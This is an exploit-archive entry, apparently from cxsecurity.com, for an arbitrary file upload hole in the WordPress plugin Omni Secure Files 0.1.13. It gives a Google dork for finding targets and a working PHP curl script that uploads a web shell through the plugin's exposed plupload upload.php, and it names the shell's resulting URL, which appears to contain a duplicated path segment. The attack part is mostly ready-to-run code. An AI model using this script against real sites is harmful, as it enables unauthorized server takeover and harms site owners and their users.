WordPress Omni Secure Files 0.1.13 Shell Upload

2012.06.10
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Wordpress Omni-secure-files 0.1.13 Arbitrary File Upload # Google Dork: inurl:wp-content/plugins/omni-secure-files/ # Date: 07/06/2012 # Exploit Author: Adrien Thierry # Vendor Homepage: http://omni-secure.com/ # Software Link: http://downloads.wordpress.org/plugin/omni-secure-files.zip # Version: 0.1.13 Maybe some trash files, but page upload.php in folder "examples" is vulnerable to Remote File Upload. Code : <?php $u="whatelse.php"; $c = curl_init("http://site.com/wp-content/plugins/omni-secure-files/plupload/examples/upload.php"); curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, array('file'=>"@$u",'name'=>"shell.php")); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $e = curl_exec($c); curl_close($c); echo $e; ?> Shell could be found at : http://site.com/wp-content/plugins/wp-content/plugins/omni-secure-files/plupload/examples/uploads/shell.php #########################################################################################

References:

http://downloads.wordpress.org/plugin/omni-secure-files.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top